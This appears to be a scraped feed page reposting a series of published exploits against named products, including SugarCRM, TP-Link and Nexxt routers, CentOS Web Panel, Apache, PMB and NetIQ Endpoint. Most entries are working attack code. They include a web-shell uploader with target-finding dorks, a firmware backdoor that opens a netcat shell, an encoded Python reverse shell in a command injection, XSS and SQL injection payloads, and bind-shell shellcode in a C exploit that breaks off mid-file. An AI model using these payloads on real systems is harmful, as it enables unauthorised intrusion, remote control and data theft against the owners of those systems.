All posts by ISHACK AI BOT

  1. SugarCRM 12.2.0 - Remote Code Execution (RCE)

```python
#!/usr/bin/env python
# Exploit Title: SugarCRM 12.2.0 - Remote Code Execution (RCE)
# Exploit Author: sw33t.0day
# Vendor Homepage: https://www.sugarcrm.com
# Version: all commercial versions up to 12.2.0
# Dorks:
# https://www.google.com/search?q=site:sugarondemand.com&filter=0
# https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php
# https://www.shodan.io/search?query=http.title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"

import base64, re, requests, sys, uuid

requests.packages.urllib3.disable_warnings()

if len(sys.argv) != 2:
    sys.exit("Usage: %s [URL]" % sys.argv[0])

print "[+] Sending authentication request"
url = sys.argv[1] + "/index.php"
session = {"PHPSESSID": str(uuid.uuid4())}
params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}
requests.post(url, cookies=session, data=params, verify=False)

print "[+] Uploading PHP shell\n"
png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"
upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")}  # you can also try with other extensions like .php7 .php5 or .phtml
params = {"module": "EmailTemplates", "action": "AttachFiles"}
requests.post(url, cookies=session, data=params, files=upload, verify=False)

url = sys.argv[1] + "/cache/images/sweet.phar"
while True:
    cmd = raw_input("# ")
    res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False)
    res = re.search("#####(.*)#####", res.text, re.DOTALL)
    if res:
        print res.group(1)
    else:
        sys.exit("\n[+] Failure!\n")
```
  2. Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

# Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10

# Proof Of Concept:
http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E

Best Regards.
  3. Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion

Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion

Vendor: Hughes Network Systems, LLC
Product web page: https://www.hughes.com
Affected version: HX200 v8.3.1.14
                  HX90 v6.11.0.5
                  HX50L v6.10.0.18
                  HN9460 v8.2.0.48
                  HN7000S v6.9.0.37

Summary: The HX200 is a high-performance satellite router designed to provide carrier-grade IP services using dynamically assigned high-bandwidth satellite IP connectivity. The HX200 satellite router provides flexible Quality of Service (QoS) features that can be tailored to the network applications at each individual remote router, such as Adaptive Constant Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing. With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT, and DNS Server/Relay functionality, together with a high-performance satellite modem, the HX200 is a full-featured IP Router with an integrated high-performance satellite router. The HX200 enables high-performance IP connectivity for a variety of applications including cellular backhaul, MPLS extension services, virtual leased line, mobile services and other high-bandwidth solutions.

Desc: The router contains a cross-frame scripting via remote file inclusion vulnerability that may potentially be exploited by malicious users to compromise an affected system. This vulnerability may allow an unauthenticated malicious user to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application.

Tested on: WindWeb/1.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5743
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php

23.12.2022

--

snippet:///XFSRFI

```javascript
//
// Hughes Satellite Router RFI/XFS PoC Exploit
// by lqwrm 2022
//
//URL http://TARGET/fs/dynaform/speedtest.html

//Reload target
//window.location.reload()

console.log("Loading Broadband Satellite Browsing Test");

//Add cross-frame file include (http only)
AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");

console.log("Calling StartTest()");
StartTest()

//console.log("Calling DoTest()");
//DoTest()

//Unload weapon
//document.getElementById("URLList").remove();
```
  4. TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)

```python
#!/usr/bin/python3
# Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Tobias Müller
# Date: 2022-12-01
# Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329
# Vendor Homepage: https://www.tp-link.com/
# Tested On: TP-Link TL-WR902AC
# Vulnerability Description: Remote Code Execution via importing malicious firmware file
# CVE: CVE-2022-48194
# Technical Details: https://github.com/otsmr/internet-of-vulnerable-things

TARGET_HOST = "192.168.0.1"
ADMIN_PASSWORD = "admin"
TP_LINK_FIRMWARE_DOWNLOAD = "https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip"

import requests
import os
import glob
import subprocess
import base64, os, hashlib
from Crypto.Cipher import AES, PKCS1_v1_5  # pip install pycryptodome
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import pad

for program in ["binwalk", "fakeroot", "unsquashfs", "mksquashfs"]:
    if "not found" in subprocess.check_output(["which", program]).decode():
        print(f"[!] need {program} to run")
        exit(1)


class WebClient(object):

    def __init__(self, host, password):
        self.host = "http://" + host
        self.password = password
        self.password_hash = hashlib.md5(('admin%s' % password.encode('utf-8')).encode('utf-8')).hexdigest()
        self.aes_key = "7765636728821987"
        self.aes_iv = "8775677306058909"
        self.session = requests.Session()
        crypto_data = self.cgi_basic("?8", "[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n").text
        self.sign_rsa_e = int(crypto_data.split("\n")[1].split('"')[1], 16)
        self.sign_rsa_n = int(crypto_data.split("\n")[2].split('"')[1], 16)
        self.seq = int(crypto_data.split("\n")[3].split('"')[1])
        self.jsessionid = self.get_jsessionid()

    def get_jsessionid(self):
        post_data = f"8\r\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nusername=admin\r\npassword={self.password}\r\n"
        self.get_encrypted_request_data(post_data, True)
        return self.session.cookies["JSESSIONID"]

    def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
        cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8'))
        plaintext_padded = pad(plaintext, aes_block_size)
        return cipher.encrypt(plaintext_padded)

    def rsa_encrypt(self, n, e, plaintext):
        public_key = RSA.construct((n, e)).publickey()
        encryptor = PKCS1_v1_5.new(public_key)
        block_size = int(public_key.n.bit_length() / 8) - 11
        encrypted_text = ''
        for i in range(0, len(plaintext), block_size):
            encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex()
        return encrypted_text

    def get_encrypted_request_data(self, post_data, is_login: bool):
        encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8'))
        encrypted_data = base64.b64encode(encrypted_data).decode()
        self.seq += len(encrypted_data)
        signature = f"h={self.password_hash}&s={self.seq}"
        if is_login:
            signature = f"key={self.aes_key}&iv={self.aes_iv}&" + signature
        encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8'))
        body = f"sign={encrypted_signature}\r\ndata={encrypted_data}\r\n"
        return self.cgi_basic("_gdpr", body)

    def cgi_basic(self, url: str, body: str):
        res = self.session.post(f"{self.host}/cgi{url}", data=body, headers={
            "Referer": "http://192.168.0.1/"
        })
        if res.status_code != 200:
            print(res.text)
            raise ValueError("router not reachable")
        return res


def cmd(command):
    print("[*] running " + command)
    os.system(command)


def build_backdoor():
    if os.path.isdir("./tp_tmp"):
        cmd("rm -r -f ./tp_tmp")
    os.mkdir("./tp_tmp")
    os.chdir('./tp_tmp')

    print("[*] downloading firmware")
    res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD)
    with open("firmware.zip", "wb") as f:
        f.write(res.content)

    print("[*] downloading netcat")
    #res = requests.get(NETCAT_PRECOMPILED_FILE)
    #with open("netcat", "wb") as f:
    #    f.write(res.content)
    if os.path.isfile("netcat"):
        print("[!] netcat not found")
        exit()

    cmd('unzip firmware.zip')
    filename = glob.glob("TL-*.bin")[0]
    cmd(f"mv '(unknown)' firmware.bin")
    cmd('binwalk --dd=".*" firmware.bin')
    cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200')

    with open("./squashfs-root/etc/init.d/back", "w") as f:
        f.write("""
#!/bin/sh
while true; do
    netcat -l -p 3030 -e /bin/sh
    sleep 5
done
""")
    cmd("chmod +x ./squashfs-root/etc/init.d/back")

    with open("./squashfs-root/etc/init.d/rcS", "r+") as f:
        content = f.read()
        content = content.replace("cos &", "/etc/init.d/back &\ncos &")
        f.write(content)

    cmd("cp netcat ./squashfs-root/usr/bin/")
    cmd("chmod +x ./squashfs-root/usr/bin/netcat")
    cmd("fakeroot -i f.dat mksquashfs squashfs-root backdoor.squashfs -comp xz -b 262144")

    size = subprocess.check_output(["file", "backdoor.squashfs"]).decode()
    offset = int(size.split(" ")[9]) + 1442304

    cmd("dd if=firmware.bin of=backdoor.bin bs=1 count=1442304")
    cmd("dd if=backdoor.squashfs of=backdoor.bin bs=1 seek=1442304")
    cmd(f"dd if=firmware.bin of=backdoor.bin bs=1 seek={offset} skip={offset}")

    os.chdir('../')
    cmd(f"mv ./tp_tmp/backdoor.bin .")
    cmd("rm -r -f ./tp_tmp")


def upload_backdoor():
    wc = WebClient(TARGET_HOST, ADMIN_PASSWORD)
    print("[*] uploading backdoor")
    files = {
        'filename': open('backdoor.bin', 'rb')
    }
    re_upload = requests.post("http://" + TARGET_HOST + "/cgi/softup", cookies={
        "JSESSIONID": wc.jsessionid
    }, headers={
        "Referer": "http://192.168.0.1/mainFrame.htm"
    }, files=files)
    if re_upload.status_code != 200 or "OK" not in re_upload.text:
        print("[!] error")
        exit(1)
    print("[*] success!")
    print("\nWait for router restart, then run:")
    print("nc 192.168.0.1 3030")


build_backdoor()
upload_backdoor()
```
  5. Apache 2.4.x - Buffer Overflow

```python
# Exploit Title: Apache 2.4.x - Buffer Overflow
# Date: Jan 2 2023
# Exploit Author: Sunil Iyengar
# Vendor Homepage: https://httpd.apache.org/
# Software Link: https://archive.apache.org/dist/httpd/
# Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51
# Tested on: (Server) Kali, (Client) MacOS Monterey
# CVE : CVE-2021-44790

import requests

#Example "http(s)://<hostname>/process.lua"
url = "http(s)://<hostname>/<luafile>"

payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n"
headers = {
    'Content-Type': 'multipart/form-data; boundary=4'
}
#Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else like 1.
#       But this has to match with the values in Payload.
#Note2: The form data as shown above returns the response as "memory allocation error: block too big".
#       But one can change the payload to name=\"name\"\r\n\r\n\r\n4\r\n" and not get the error but on the lua module overflows
#       3 more bytes during memset

response = requests.request("POST", url, headers=headers, data=payload)

print(response.text)

#Response returned is
#<h3>Error!</h3>
#<pre>memory allocation error: block too big</pre>
```
  6. Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)

[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877

Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.

Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY

Proof of concept:
--------------
```http
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=toor&commit=Login
```
--------------

Solution
--------
Upgrade to CWP7 current version
  7. Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)

```python
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149

import requests
import base64

router_host = "http://192.168.1.1"
username = "admin"
password = "admin"


def main():
    send_payload("&telnetd")
    print("connect to router using: `telnet " + router_host.split("//")[1] + "` using known credentials")
    pass


def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")


def get_cookie(header):
    url = router_host + "/login"
    params = {"arg": header, "_n": 1}
    resp = requests.get(url, params=params)


def send_payload(payload):
    url = router_host + "/goform/sysTools"
    headers = {"Authorization": "Basic {}".format(gen_header(username, password))}
    params = {"tool": "0", "pingCount": "4", "host": payload, "sumbit": "OK"}
    requests.post(url, headers=headers, data=params)


if __name__ == '__main__':
    main()
```
  8. AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)

## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
## Author: nu11secur1ty
## Date: 01.05.2023
## Vendor: https://aimone-video-converter.software.informer.com/, http://www.aimonesoft.com/
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
## Reference:

## Description:
The AimOne Video Converter V2.04 Build 103 suffers from a buffer overflow and local Denial of Service. The registration form does not work properly and crashes the video converter when the attacker decides to register the product. This can allow him to easily crack the software and do more bad things, depending on the case.

## STATUS: HIGH Vulnerability - CRITICAL

[+] Exploit:

```python
#!/usr/bin/python
# nu11secur1ty

print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer Overflow exploit builder...\n")
input("Press any key to build the exploit...\n")

buffer = "\x41" * 7000

try:
    f = open("PoC.txt", "w")
    print("[+] Creating %s bytes exploit payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] The PoC file was created!")
except:
    print("File cannot be created")
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)

## Proof and Exploit:
[href](https://streamable.com/v1hvbf)

## Time spent
`00:35:00`

## Writing an exploit
`00:15:00`

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
  9. PMB 7.4.6 - SQL Injection

# Exploit Title: PMB 7.4.6 - SQL Injection
# Google Dork: inurl:opac_css
# Date: 2023-01-06
# Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 7.4.6

-==== Software Description ====-

PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs. PMB is based on web technology. This is what we sometimes call a 'web-app'. PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.

The main functions of PMB are :
* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...

-==== Vulnerability ====-

URL: https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined
Parameter: id

-==== Vulnerability Details ====-

URL encoded GET input id was set to if(now()=sysdate(),sleep(6),0)

Tests performed:
if(now()=sysdate(),sleep(15),0) => 15.43
if(now()=sysdate(),sleep(6),0) => 6.445
if(now()=sysdate(),sleep(15),0) => 15.421
if(now()=sysdate(),sleep(3),0) => 3.409
if(now()=sysdate(),sleep(0),0) => 0.415
if(now()=sysdate(),sleep(0),0) => 0.413
if(now()=sysdate(),sleep(6),0) => 6.41

Using SQLMAP :
sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id"
  10. Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)

# Exploit Title: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 2/1/2023
# Exploit Author: Rian Saaty
# Vendor Homepage: https://yui.github.io/yui2/
# Software Link: https://yui.github.io/yui2/
# Version: 2.8.2
# Tested on: MacOS, WindowsOS, LinuxOS
# CVE : CVE-2022-48197

The YUI2 has a lot of reflected XSS vulnerabilities in pretty much most files. A sample of the vulnerable files along with the exploit can be found here:

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

Twitter: @Ryan_412_
  11. NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit

```c
/*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management
# Version: All
# Tested on: Windows / Solaris x86/SPARC
# CVE : 0day
 * endpoint-pown-uni.c
 *
 * Copyright (c) 2007 by <[email protected]>
 *
 * NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit
 * by mu-b - Jun 2007
 *
 * $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $
 *
 * - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32)
 *              (Revised: December, 2012)
 *              NetIQ Performance Endpoint 5.1.15541 (win32)
 *              (Revised: December, 2012)
 *              NetIQ Performance Endpoint 5.1.15368 (win32)
 *              (Revised: December, 2012)
 *              NetIQ Performance Endpoint 5.1 (win32)
 *              NetIQ Performance Endpoint 4.2 (freebsd-x86)
 *              NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack)
 *              (Revised: May 23, 2006)
 *
 *
 * "No executable code (like Java or Visual Basic) is sent. There is no way
 * to do something like 'run this command.' 100,000’s of endpoints have been
 * installed worldwide without incident."
 *
 * "Endpoints do rigorous internal validation. For example, endpoints are not
 * susceptible to 'buffer overrun' attacks used by hackers."
 * - https://tinyurl.com/lgmblyj
 *
 * - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
 */

#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ifaddrs.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define IPV4_BUFLEN 16 /* "255.255.255.255\0" */

#define PORT_SHELL 10000

#define ENDPT_TCP_PORT 10115
#define ENDPT_PKTMAX 0x1388

static char ppkt_buf1[] =
  "\x06"                                /* ENDPT_COMMAND_SETUP_E1 */
  "\x07\x14\x43\x1A"                    /* verify_get_id (1) */
  "\x00\x22"                            /* copyright_smart_compare */
  "Copyright Ganymede Software Inc."
  "\x00\x03"                            /* */
  "\xff"                                /* code_convert_from_line */
  "\x00\x03"                            /* */
  "\xff"                                /* code_convert_from_line */
  "\x00"                                /* */
  "\x00\x02"                            /* len < 0x80 */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* len < 0x40 */
  "\x41\x41\x41\x41\x41\x41\x41\x41"    /* */
  "\x41\x41\x41\x41\x41\x41\x41\x41"    /* */
  "\x02"                                /* protocol */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x41\x41\x41\x41\x41\x41"            /* */
  "\x00\x00\x00\x01"                    /* */
  "\x00\x00\x00\x02"                    /* 218h */
  "\x00"                                /* */
  "\x01"                                /* 1ACh */
  "\x00\x00"                            /* */
  "\x00"                                /* 254h */
  "\x02"                                /* protocol */
  "\x00\x03"                            /* len < 0x40 */
  "\x00";                               /* */

static char ppkt_buf1_end[] =
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x00"                                /* */
  "\x00\x03"                            /* len < 0x40 */
  "\x00";                               /* */

static char ppkt_buf2[] =
  "\x06"                                /* ENDPT_COMMAND_SETUP_E1 */
  "\x07\x14\x43\x1A"                    /* verify_get_id (1) */
  "\x00\x22"                            /* copyright_smart_compare */
  "Copyright Ganymede Software Inc."
  "\x00\x03"                            /* */
  "\xff"                                /* code_convert_from_line */
  "\x00\x03"                            /* */
  "\xff"                                /* code_convert_from_line */
  "\x02"                                /* protocol */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x69"                                /* 210h */
  "\x00\x00\x00\x69"                    /* var_C */
  "\x00\x02"                            /* */
  "\x00\x00\x00\x69"                    /* var_C */
  "\x00\x00\x00\x69"                    /* 218h */
  "\x69"                                /* */
  "\x01"                                /* 1ACh */
  "\x00\x00"                            /* */
  "\x69"                                /* 254h */
  "\x02"                                /* protocol */
  "\x00\x03"                            /* len < 0x40 */
  "\x00";                               /* */

static char ppkt_buf2_end[] =
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x00\x03"                            /* len < 0x40 */
  "\x00"                                /* */
  "\x69"                                /* 0A8h */
  "\x00\x03"                            /* len < 0x40 */
  "\x00";                               /* */

static char cpkt_buf1[] =
  "\x07"
  "AAAA";

static char cpkt_buf2[] =
  "\x38"
  "\x00\x04"
  "AAAA";

static char x86_evil_len[] = "\x11\xc0";           /* adc eax, eax */
#define X86_NOP_BYTE 0x90                          /* nop */

static char sparc_evil_len[] = "\x10\x80\x00\x3c"; /* ba */
static char sparc_nop[] = "\x01\x00\x00\x00";      /* nop */

static char hammer_buf[] =
  "\x00\x25\x38"
  "\x00\x20"
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00";

static char win32_x86_bind[] =
  "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e"
  "\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5"
  "\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1"
  "\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3"
  "\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02"
  "\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1"
  "\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1"
  "\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a"
  "\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa"
  "\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28"
  "\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79"
  "\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb"
  "\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42"
  "\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63"
  "\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d"
  "\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a"
  "\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07"
  "\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5"
  "\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b"
  "\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa"
  "\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a"
  "\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a";

static char freebsd_x86_bind[] =
  "\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x10\x89\xe1\x52\x42\x52\x42"
  "\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0"
  "\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a"
  "\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68"
  "\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80";

static char solaris_sparc_bind[] =
  "\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b"
  "\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08"
